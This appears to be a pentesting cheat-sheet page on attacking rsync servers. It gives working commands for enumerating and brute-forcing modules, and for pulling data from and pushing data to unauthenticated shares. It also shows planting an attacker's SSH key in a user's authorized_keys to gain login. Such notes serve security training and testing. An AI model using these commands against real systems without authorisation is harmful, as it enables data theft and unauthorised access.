Rsync Pentesting

Rsync is utility for efficiently transferring and synchronizing files between a computer and a storage drive and across networked computers by comparing the modification times and sizes of files. A default port is 873.

Enumeration

nmap --script rsync-list-modules -p 873 <target-ip>
nmap --script rsync-brute --script-args 'rsync-brute.module=www' <target-ip>

# Banner grabbing and list shared folders
# We can execute commands (modules) that we found, after entering '@RSYNCD: <version>'.
nc -nv <target-ip> 873
@RSYNCD: 31.0
#list
raidroot
Conf
@RSYNCD: EXIT

# List sync data using rsync
rsync <target-ip>::
rsync -av --list-only rsync://<target-ip>

# List sync data using Metasploit
msf> use auxiliary/scanner/rsync/modules_list

When we found the shared folder, check if we can connect without authentication. Assume that we found the “shares” folder.

# Netcat
nc -nv <target-ip> 873
RSYNCD: 31.0
shares
RSYNCD: OK

# Rsync
rsync <target-ip>::shares
rsync -av --list-only rsync://<target-ip>:873/shares

Check Config File

find / -name "rsyncd.conf" 2>/dev/null
cat /path/to/rsyncd.conf

Sync Data

After gathering modules (shared folders), we can sync it with our local folder.

From Remote to Local

We can sync a remote folder with a local folder.

# -a: Arvhice
# -v: Verbose
rsync -av <remote-ip>::<src_dir> <dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
mkdir test_shared
rsync -av <remote-ip>::share test_shared
rsync -av rsync://<remote-ip>:873/share test_shared

If we want to update sync data, modify files in the shared folder then rsync back with “From Local to Remote”.

From Local to Remote

We can sync our local folder with a remote folder.

# -a: Arvhice
# -v: Verbose
rsync -av <src_dir> <remote-ip>::<dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
rsync -av test_shared <remote-ip>::share
rsync -av test_shared rsync://<remote-ip>:873/share

1. Generate a SSH key in local machine

Copy the content of the public key to the authorized_keys.

ssh-keygen -f testkey
cat testkey.pub > authorized_keys

2. Sync the authorized_keys with the remote .ssh directory

rsync authorized_keys rsync://<remote-user>@<remote-ip>:873/<home_user>/.ssh

ssh <remote-home-user>@<remote-ip> -i testkey

References

Linuxize

PreviousReDoS (Regular Expression Denial of Service)NextProtocols

Last updated 1 month ago

hashtagEnumeration

hashtagCheck Config File

hashtagSync Data

hashtagFrom Remote to Local

hashtagFrom Local to Remote

hashtagSSH Key Syncing and SSH Login

hashtag1. Generate a SSH key in local machine

hashtag2. Sync the authorized_keys with the remote .ssh directory

hashtag3. SSH login with the generated private key

hashtagReferences